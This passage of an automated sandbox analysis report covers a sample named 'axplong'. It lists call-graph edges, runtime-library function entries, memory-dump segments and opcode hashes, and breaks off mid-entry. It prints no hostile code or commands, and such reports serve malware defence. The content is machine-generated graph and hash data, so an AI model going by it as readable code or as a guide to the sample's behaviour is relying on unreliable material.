38115->38117 38116->38117 38119 6a7443 __dosmaperr RtlAllocateHeap 38116->38119 38143 6b165a 38117->38143 38120 6b16fa 38119->38120 38150 6a6b8a RtlAllocateHeap __wsopen_s 38120->38150 38122 6b173d 38123 6b176c 38122->38123 38125 6a7443 __dosmaperr RtlAllocateHeap 38122->38125 38128 6b17ba __wsopen_s 38123->38128 38152 6a9a21 RtlAllocateHeap __dosmaperr __wsopen_s 38123->38152 38126 6b1761 38125->38126 38151 6a6b8a RtlAllocateHeap __wsopen_s 38126->38151 38128->38064 38132 6abd17 __FrameHandler3::FrameUnwindToState IsInExceptionSpec 38129->38132 38131 6abd48 __wsopen_s 38131->38069 38132->38131 38154 6abae5 38132->38154 38133->38081 38134->38074 38135->38081 38136->38085 38137->38084 38138->38086 38139->38092 38140->38089 38141->38096 38142->38092 38144 6b1672 38143->38144 38145 6a7443 __dosmaperr RtlAllocateHeap 38144->38145 38146 6b168d 38144->38146 38147 6b16b1 38145->38147 38146->38122 38153 6a6b8a RtlAllocateHeap __wsopen_s 38147->38153 38149 6b16bc 38149->38122 38150->38117 38151->38123 38152->38128 38153->38149 38155 6ad6ef _unexpected RtlAllocateHeap 38154->38155 38157 6abaf7 __wsopen_s 38155->38157 38156 6aacb5 __freea RtlAllocateHeap 38158 6abb59 38156->38158 38157->38156 38158->38131 38159 67a0de 38161 67a0e6 ISource 38159->38161 38160 67a865 38163 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38160->38163 38161->38160 38162 67a1b9 ISource 38161->38162 38164 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38162->38164 38167 67a883 38163->38167 38165 67a833 38164->38165 38166 67a8d7 38167->38166 38170 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 38167->38170 38169 67a8e0 38170->38169 38171 67a47d 38175 67a485 ISource 38171->38175 38172 67a874 38174 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38172->38174 38173 67a558 ISource 38177 687f30 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38173->38177 38176 67a879 38174->38176 38175->38172 38175->38173 38178 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38176->38178 38179 67a833 38177->38179 38180 67a87e 38178->38180 38181 6a6b9a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 38180->38181 38183 67a883 38180->38183 38181->38183 38182 67a8d7 38183->38182 38186 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 38183->38186 38185 67a8e0 38186->38185 38187 68d692 38188 68d69e __FrameHandler3::FrameUnwindToState 38187->38188 38208 68d3b8 38188->38208 38190 68d7fe ___scrt_fastfail 38229 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 38190->38229 38192 68d80b 38230 6a651d GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 38192->38230 38194 68d813 ___security_init_cookie 38196 68d819 __scrt_common_main_seh 38194->38196 38195 68d6ee 38197 68d76f 38212 6a947d 38197->38212 38199 68d6a5 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec ___scrt_release_startup_lock 38199->38190 38199->38195 38199->38197 38228 6a6533 5 API calls 4 library calls 38199->38228 38201 68d775 38216 686ba0 38201->38216 38209 68d3c1 38208->38209 38210 68d3d6 ___scrt_uninitialize_crt 38209->38210 38231 6a98e9 38209->38231 38210->38199 38213 6a948b 38212->38213 38214 6a9486 38212->38214 38213->38201 38255 6a91e1 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38214->38255 38256 67a890 38216->38256 38220 686bb5 38221 67d5e0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 38220->38221 38222 686bba 38221->38222 38223 684ed0 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 38222->38223 38224 686bbf 38223->38224 38225 675f30 RtlAllocateHeap RtlAllocateHeap 38224->38225 38226 686bc4 38225->38226 38227 675f30 RtlAllocateHeap RtlAllocateHeap 38226->38227 38227->38226 38228->38197 38229->38192 38230->38194 38234 6aed3e 38231->38234 38235 6a98f8 38234->38235 38236 6aed4e 38234->38236 38235->38210 38236->38235 38238 6ac31c 38236->38238 38239 6ac328 __FrameHandler3::FrameUnwindToState IsInExceptionSpec 38238->38239 38244 6abb95 38239->38244 38241 6ac33e 38243 6ac348 38241->38243 38253 6ac1b2 RtlAllocateHeap 38241->38253 38243->38236 38245 6abba1 __FrameHandler3::FrameUnwindToState 38244->38245 38246 6abbaa 38245->38246 38252 6abbcb IsInExceptionSpec 38245->38252 38247 6a7443 __dosmaperr RtlAllocateHeap 38246->38247 38248 6abbaf 38247->38248 38254 6a6b8a RtlAllocateHeap __wsopen_s 38248->38254 38250 6abbb9 38250->38241 38251 6abae5 __wsopen_s RtlAllocateHeap 38251->38252 38252->38250 38252->38251 38253->38243 38254->38250 38255->38213 38258 67a898 38256->38258 38257 67a8d7 38261 67cd50 38257->38261 38258->38257 38266 6a6559 GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 38258->38266 38260 67a8e0 38262 687870 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 38261->38262 38263 67cda2 38262->38263 38264 675b20 2 API calls 38263->38264 38265 67cdad 38264->38265 38266->38260 38267 6a6c17 38268 6a6c1a 38267->38268 38283 6a8aaf 38268->38283 38270 6a6c26 38271 6a6c43 38270->38271 38272 6a6c35 38270->38272 38274 6a68bd _unexpected GetPEB GetPEB RtlAllocateHeap 38271->38274 38273 6a6c99 _unexpected GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 38272->38273 38275 6a6c3f 38273->38275 38276 6a6c5d 38274->38276 38277 6a681d _unexpected RtlAllocateHeap RtlAllocateHeap 38276->38277 38278 6a6c6a 38277->38278 38279 6a6c71 38278->38279 38280 6a6c99 _unexpected GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 38278->38280 38281 6a6c93 38279->38281 38282 6aacb5 __freea RtlAllocateHeap 38279->38282 38280->38279 38282->38281 38284 6a8ab4 IsInExceptionSpec 38283->38284 38288 6a8abf IsInExceptionSpec 38284->38288 38289 6ad4f4 3 API calls 5 library calls 38284->38289 38287 6a8af2 38290 6a651d GetPEB GetPEB RtlAllocateHeap IsInExceptionSpec 38288->38290 38289->38288 38290->38287 38291 6abf95 38292 6ac138 38291->38292 38295 6abfbf 38291->38295 38293 6a7443 __dosmaperr RtlAllocateHeap 38292->38293 38294 6ac123 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z __wsopen_s 38293->38294 38295->38292 38296 6ac00a 38295->38296 38306 6b27eb 38296->38306 38298 6ac02a 38310 6b1ff9 38298->38310 38300 6ac03e 38300->38294 38317 6b2025 38300->38317 38302 6ac050 38302->38294 38324 6b2051 38302->38324 38304 6ac062 38304->38294 38331 6b2848 RtlAllocateHeap __FrameHandler3::FrameUnwindToState IsInExceptionSpec 38304->38331 38307 6b27f7 __FrameHandler3::FrameUnwindToState IsInExceptionSpec 38306->38307 38309 6b281c 38307->38309 38332 6b270d 38307->38332 38309->38298 38311 6b201a 38310->38311 38312 6b2005 38310->38312 38311->38300 38313 6a7443 __dosmaperr RtlAllocateHeap 38312->38313 38314 6b200a 38313->38314 38439 6a6b8a RtlAllocateHeap __wsopen_s 38314->38439 38316 6b2015 38316->38300 38318 6b2031 38317->38318 38319 6b2046 38317->38319 38320 6a7443 __dosmaperr RtlAllocateHeap 38318->38320 38319->38302 38321 6b2036 38320->38321 38440 6a6b8a RtlAllocateHeap __wsopen_s 38321->38440 38323 6b2041 38323->38302 38325 6b205d 38324->38325 38326 6b2072 38324->38326 38327 6a7443 __dosmaperr RtlAllocateHeap 38325->38327 38326->38304 38328 6b2062 38327->38328 38441 6a6b8a RtlAllocateHeap __wsopen_s 38328->38441 38330 6b206d 38330->38304 38331->38294 38334 6b2759 38332->38334 38333 6b2760 38336 6b27d0 38333->38336 38337 6b27c7 38333->38337 38334->38333 38427 6aaf0b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::ThreadScheduler::Create 38334->38427 38344 6b27cd 38336->38344 38399 6b25b2 38336->38399 38348 6b23d7 38337->38348 38339 6b277f 38345 6aacb5 __freea RtlAllocateHeap 38339->38345 38340 6b2778 38340->38339 38346 6b27a5 38340->38346 38342 6aacb5 __freea RtlAllocateHeap 38343 6b27db __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 38342->38343 38343->38309 38344->38342 38345->38333 38347 6aacb5 __freea RtlAllocateHeap 38346->38347 38347->38333 38349 6b23e6 38348->38349 38350 6b2051 RtlAllocateHeap 38349->38350 38351 6b23fc 38350->38351 38352 6b1ff9 RtlAllocateHeap 38351->38352 38353 6b2581 __wsopen_s 38351->38353 38354 6b240e 38352->38354 38356 6b2051 RtlAllocateHeap 38353->38356 38397 6b2588 38353->38397 38354->38353 38355 6aacb5 __freea RtlAllocateHeap 38354->38355 38354->38397 38357 6b245e 38355->38357 38358 6b25d7 38356->38358 38428 6aaf0b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::ThreadScheduler::Create 38357->38428 38360 6b1ff9 RtlAllocateHeap 38358->38360 38367 6b2702 __wsopen_s 38358->38367 38362 6b25e9 38360->38362 38361 6b2476 38363 6aacb5 __freea RtlAllocateHeap 38361->38363 38364 6b2025 RtlAllocateHeap 38362->38364 38362->38367 38369 6b2482 38363->38369 38365 6b25fb 38364->38365 38366 6b2604 38365->38366 38365->38367 38368 6aacb5 __freea RtlAllocateHeap 38366->38368 38384 6b2760 38367->38384 38436 6aaf0b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::ThreadScheduler::Create 38367->38436 38386 6b260f 38368->38386 38369->38397 38429 6aa0b1 RtlAllocateHeap __dosmaperr __wsopen_s 38369->38429 38372 6b27d0 38375 6b27cd 38372->38375 38376 6b25b2 4 API calls 38372->38376 38373 6b24ac 38373->38353 38430 6b4924 RtlAllocateHeap __dosmaperr __wsopen_s 38373->38430 38374 6b27c7 38378 6b23d7 4 API calls 38374->38378 38379 6aacb5 __freea RtlAllocateHeap 38375->38379 38376->38375 38377 6b277f 38382 6aacb5 __freea RtlAllocateHeap 38377->38382 38378->38375 38380 6b27db __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 38379->38380 38380->38344 38382->38384 38383 6b2778 38383->38377 38385 6b27a5 38383->38385 38384->38372 38384->38374 38387 6aacb5 __freea RtlAllocateHeap 38385->38387 38391 6b267e __cftof 38386->38391 38435 6aedd7 GetPEB GetPEB RtlAllocateHeap _unexpected __fassign 38386->38435 38387->38384 38388 6b24c5 38388->38353 38431 6a8a81 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38388->38431 38391->38344 38392 6b24ea 38393 6b2540 38392->38393 38432 6a8a81 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38392->38432 38393->38397 38434 6b4924 RtlAllocateHeap __dosmaperr __wsopen_s 38393->38434 38395 6b2511 38395->38393 38433 6a8a81 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 38395->38433 38397->38344 38400 6b25c1 38399->38400 38401 6b2051 RtlAllocateHeap 38400->38401 38402 6b25d7 38401->38402 38403 6b1ff9 RtlAllocateHeap 38402->38403 38408 6b2702 __wsopen_s 38402->38408 38404 6b25e9 38403->38404 38405 6b2025 RtlAllocateHeap 38404->38405 38404->38408 38406 6b25fb 38405->38406 38407 6b2604 38406->38407 38406->38408 38410 6aacb5 __freea RtlAllocateHeap 38407->38410 38409 6b2760 38408->38409 38438 6aaf0b RtlAllocateHeap RtlAllocateHeap __dosmaperr _unexpected Concurrency::details::ThreadScheduler::Create 38408->38438 38412 6b27d0 38409->38412 38413 6b27c7 38409->38413 38420 6b260f 38410->38420 38414 6b27cd 38412->38414 38415 6b25b2 4 API calls 38412->38415 38417 6b23d7 4 API calls 38413->38417 38418 6aacb5 __freea RtlAllocateHeap 38414->38418 38415->38414 38416 6b277f 38421 6aacb5 __freea RtlAllocateHeap 38416->38421 38417->38414 38419 6b27db __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 38418->38419 38419->38344 38426 6b267e __cftof 38420->38426 38437 6aedd7 GetPEB GetPEB RtlAllocateHeap _unexpected __fassign 38420->38437 38421->38409 38422 6b2778 38422->38416 38423 6b27a5 38422->38423 38424 6aacb5 __freea RtlAllocateHeap 38423->38424 38424->38409 38426->38344 38427->38340 38428->38361 38429->38373 38430->38388 38431->38392 38432->38395 38433->38393 38434->38353 38435->38391 38436->38383 38437->38426 38438->38422 38439->38316 38440->38323 38441->38330

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 006B197C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1762 6b197c-6b19ac call 6b16ca 1765 6b19ae-6b19b9 call 6a7430 1762->1765 1766 6b19c7-6b19d3 call 6abd0b 1762->1766 1773 6b19bb-6b19c2 call 6a7443 1765->1773 1771 6b19ec-6b1a35 call 6b1635 1766->1771 1772 6b19d5-6b19ea call 6a7430 call 6a7443 1766->1772 1781 6b1aa2 1771->1781 1782 6b1a37-6b1a40 1771->1782 1772->1773 1783 6b1ca1-6b1ca5 1773->1783 1787 6b1aa8-6b1aab 1781->1787 1785 6b1a42-6b1a46 1782->1785 1786 6b1a77-6b1a9d call 6a740d 1782->1786 1785->1786 1788 6b1a48-6b1a75 call 6b1635 1785->1788 1786->1773 1790 6b1aad-6b1ade call 6a740d 1787->1790 1791 6b1af4-6b1af7 1787->1791 1788->1781 1788->1786 1790->1773 1812 6b1ae4-6b1aef call 6a7443 1790->1812 1794 6b1af9-6b1afe 1791->1794 1795 6b1b00-6b1b06 1791->1795 1798 6b1b0a-6b1b58 call 6abc56 1794->1798 1795->1798 1799 6b1b08 1795->1799 1805 6b1b5a-6b1b66 call 6b1844 1798->1805 1806 6b1b77-6b1b9f call 6b13e2 1798->1806 1799->1798 1805->1806 1815 6b1b68 1805->1815 1813 6b1ba1-6b1ba2 1806->1813 1814 6b1ba4-6b1be5 1806->1814 1812->1773 1818 6b1b6a-6b1b72 call 6aae08 1813->1818 1819 6b1be7-6b1beb 1814->1819 1820 6b1c06-6b1c14 1814->1820 1815->1818 1818->1783 1819->1820 1821 6b1bed-6b1c01 1819->1821 1822 6b1c1a-6b1c1e 1820->1822 1823 6b1c9f 1820->1823 1821->1820 1822->1823 1825 6b1c20-6b1c53 call 6b1635 1822->1825 1823->1783 1830 6b1c87-6b1c9b 1825->1830 1831 6b1c55-6b1c81 call 6a740d call 6abe1e 1825->1831 1830->1823 1831->1830
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __dosmaperr
                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                    • API String ID: 2332233096-2852464175
                                                                                                                                                                                                                                                    • Opcode ID: 509582da6d9907e64e4290f3e3322f64341170baec36d9cda6a734310d00a7b2
                                                                                                                                                                                                                                                    • Instruction ID: 611a6ad88dd5446190ca7048d840ae9286e836d4ee28955fc339576ce151b342
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 509582da6d9907e64e4290f3e3322f64341170baec36d9cda6a734310d00a7b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75A13672A141449FCF19AF68DCA1BEE3BA2AB07324F54015DE811AF391DB349D42CB55
                                                                                                                                                                                                                                                    Function 006A6E01 Relevance: 1.6, APIs: 1, Instructions: 145COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006A6F12
                                                                                                                                                                                                                                                      • Part of subcall function 006A7177: __dosmaperr.LIBCMT ref: 006A71AC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __dosmaperr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2332233096-0
                                                                                                                                                                                                                                                    • Opcode ID: fc7fca5e82428a9bc5b380f12c0b0c8c714f8eb5683fc5dd029c1a3fa8dd1f25
                                                                                                                                                                                                                                                    • Instruction ID: 78435bdf0a648127e7cef19067967f093f42f239051a2dbd8ffaf0e5b14044de
